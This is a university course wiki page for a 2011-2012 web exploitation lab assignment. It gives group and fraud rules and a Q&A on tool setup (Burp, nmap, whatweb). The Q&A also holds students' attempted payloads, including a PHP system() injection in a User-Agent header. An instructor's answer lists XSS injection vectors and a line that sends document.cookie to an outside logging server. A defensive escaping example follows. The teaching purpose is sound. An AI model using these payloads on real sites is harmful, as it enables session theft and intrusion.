5MMMSI-2011-2012-practical assessment-web exploitations and basic risk analysis


Fraud

We kindly remind you that Ensimag enforces strict rules regarding fraud (see the charte d'utilisation du matériel informatique).

Teachers might use automatic fraud detection tools to observe suspect similarities between deliverables. Each proven fraud will entail that several groups will get a 0/20 mark at the practical assessment, without any 2nd session possibility. Teachers will not try to understand which group did copy and which one did not.

Recidivism will be punished in conformance to the student rules (règlement des études).

Introduction

Rules

  • each GI student has to be with 1 Ensimag student
  • each LOAD with 1 GI or SIF
  • persons per group: 2; form your groups on TEIDE; no bonus point will be granted if a group only has 1 student
  • practical assessment due on TEIDE


Requirement

ensi;qg)student

Practical assessment paper

Fichier:5MMSSI-2011-2012-TP2-web exploitation and basic risk analysis.pdf

Questions

In case you do experience some difficulty with the assessment, please ask your question here, and then also send it by email to Fabien and Karim.

Answered questions

  • Utilisateur:duchenef: how do we ask a question for that assessment?
    • Utilisateur:duchenef Answer: please write your question by copying and adapting the lines after the "Unanswered Section"
    • also please send an email to Karim and Fabien with the exact same text as the one you wrote on that page


  • the keyboard mapping is not QWERTY? Thus at the logon prompt, ensimag-student / ensimag-student does not work
    • Warning: I forgot to change the keyboard mapping (I am used to typing in QWERTY..). Thus, at the first logon screen, in case you are using an AZERTY keyboard, please type
username:  ensi,qg)student
password: ensi,qg)student

# to set the keyboard layout to azerty
setxkbmap fr
# ... US qwerty
setxkbmap us

Also have a look at http://www.wikihow.com/Change-Keyboard-Layout-in-Ubuntu

  • Using

/pentest/enumeration/web/whatweb$ ./whatweb localhost
...
> http://localhost/ex1/ ERROR: Not HTTP or cannot resolve hostname


  • Utilisateur:dietricj after configuring Firefox, Burp doesn't intercept the requests from Firefox (we have set it as shown on the paper). Anyone with the same problem?
    • Utilisateur:duchenef answer: you will also have to configure the following values:
      • network.proxy.ssl 127.0.0.1
      • network.proxy.ssl_port 8080
      • network.proxy.type 1

nmap -A 127.0.0.1

as an unprivileged user with success. You could also run

nmap -A --unprivileged 127.0.0.1

but this is unnecessary on the platform I did provide you... Maybe you are trying to run

nmap -O --unprivileged 127.0.0.1
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!

In which case I agree. But keep going, nmap -A provides you enough information at that stage.


Indeed, I tried with Live HTTP Headers REPLAY: 1.

http://localhost/../easter-eggs/ex0-secret.b64

Forbidden 430
    • user:duchenef: indeed, it cannot be accessed directly from the URL (i.e. by manipulating the input parameter of the HTTP GET method)

2.

GET http://localhost
..
User Agent <?php system('GET http://localhost/easter-eggs/ex0-secret.b64 > http://localhost'); ?>

That does not work either.

    • user:duchenef: OK, so you tried to manipulate the User-Agent input parameter. Nice try, but since your tests seem unsuccessful, I advise you to look at another input variable. A hint: there is a flag on the pedro pizza page...

3.

HTTP/1.1 200 OK
Date: Tue, 20 Mar 2012 16:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 28 Jan 2009 23:24:04 GMT
Etag: "102b15-d01b-46193447d6d00"
Accept-Ranges: bytes
..

I reused the ETag from this response to pass myself off as the source:

GET http://localhost
..
Authorization: Basic : 102b15-d01b-46193447d6d00

Can you give me a hint? Do we have to authenticate to access the target page? Do we have to crack a password, or access it via ../../?

Thanks,

    • user:duchenef: in this lab there is no attack on the cache indicator, so do not focus on that input parameter.

  • user:soutorid: The other question is about the lab, on the XSS exercise (4.2). I saw that the web page is vulnerable to attacks of this type because I can add code to the page's source code, but how can I steal the cookie?
    • user:duchenef: stealing the cookie(s) relating to the FQDN + IP of the server the victim connects to is one example of a JavaScript payload. The possibilities are many; for instance, in MISC HS 4 (Oct/Nov 2011), HB and Renaud Bidou explained the basics of an XSS botnet ;)

To come back to the initial question, you have to invoke the JavaScript interpreter (this can be done

  • on event attributes:
<IMG onerror="javascript:alert(1337);" ... />
  • via the script HTML tag:
<input ... /> <script> alert(1337); </script>

to display the cookie, you can simply do

alert(document.cookie);
  • a fun method is to send the cookie value to a remote HTTP server that logs every request. An example:
document.location='http://car-online.fr/en/CTF-tools/store_get_args/?cookie_victime='+document.cookie;
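As an added example (not code from the original page or the lab), the two injection vectors quoted in the answer above are rendered into a constructed stand-in for the lab's pizza page, once without and once with output encoding, and a quote-aware scanner checks which version still contains a script execution context. The template, the pizza-name parameter and the third attribute-breakout payload are assumptions made for the example.

```javascript
// Added example, not code from the original page: why the injection vectors above
// work, and the output encoding that stops them (template is a constructed stand-in).

// Escape untrusted text for an HTML text node or a quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The pizza name is echoed into the body and into an <input value="..."> attribute,
// once without encoding (the lab's vulnerable behaviour) and once with it.
function renderUnsafe(name) {
  return `<p>Pizza: ${name}</p><input name="pizza" value="${name}" />`;
}
function renderSafe(name) {
  const e = escapeHtml(name);
  return `<p>Pizza: ${e}</p><input name="pizza" value="${e}" />`;
}

// List script execution contexts in rendered HTML: <script> elements and on*
// event-handler attributes. Attribute parsing respects quotes, so encoded text
// sitting inside a quoted value is not mistaken for a new attribute.
function scriptContexts(html) {
  const hits = [];
  const tagRe = /<([a-zA-Z][\w-]*)([^>]*)>/g;
  const attrRe = /([^\s=\/"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let tag, a;
  while ((tag = tagRe.exec(html)) !== null) {
    const [, name, attrs] = tag;
    if (name.toLowerCase() === "script") hits.push("<script>");
    while ((a = attrRe.exec(attrs)) !== null) {
      if (/^on/i.test(a[1])) hits.push(`<${name} ${a[1]}=>`);
    }
  }
  return hits;
}

// The two payloads quoted in the answer plus an attribute-breakout variant
// (constructed) that needs no '<' at all.
const PAYLOADS = [
  '<IMG onerror="javascript:alert(1337);" src=x />',
  '<input /> <script> alert(document.cookie); </script>',
  '" onfocus="alert(document.cookie)" autofocus="',
];

// For each payload: does the rendered page contain a script context?
function audit(render) {
  return PAYLOADS.map((p) => scriptContexts(render(p)).length > 0);
}
```

Setting the session cookie with the HttpOnly flag is the complementary server-side control: document.cookie then does not expose it even when an injection gets through.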




Unanswered questions